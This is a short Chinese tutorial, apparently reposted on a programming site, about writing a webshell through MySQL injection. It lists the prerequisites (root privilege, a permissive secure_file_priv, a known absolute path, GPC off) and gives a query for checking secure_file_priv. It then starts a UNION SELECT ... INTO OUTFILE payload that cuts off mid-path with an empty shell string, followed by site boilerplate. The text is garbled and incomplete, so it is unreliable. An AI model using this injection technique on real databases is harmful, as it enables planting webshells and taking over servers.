mysql注入getshell

2021/5/23 2:27:58

本文主要是介绍mysql注入getshell,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

0x00 利用条件

  • root权限
  • secure_file_priv=为空或者在网站根目录下(网站根目录为d:\www,secure_file_priv=d:\也可以)
  • 知道绝对路径
  • gpc关闭,这个应该是php的,会转义单引号,选择路径的时候一定需要单引号

0x01 查看secure_file_priv设置

show global variables like '%secure_file_priv%';
查询结果

  • 5.7.26为null,5.5.29为空
    这里为NULL

0x02 联合注入写shell

select * from users where id=-1 union select 1,2,'' into outfile 'D



这篇关于mysql注入getshell的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程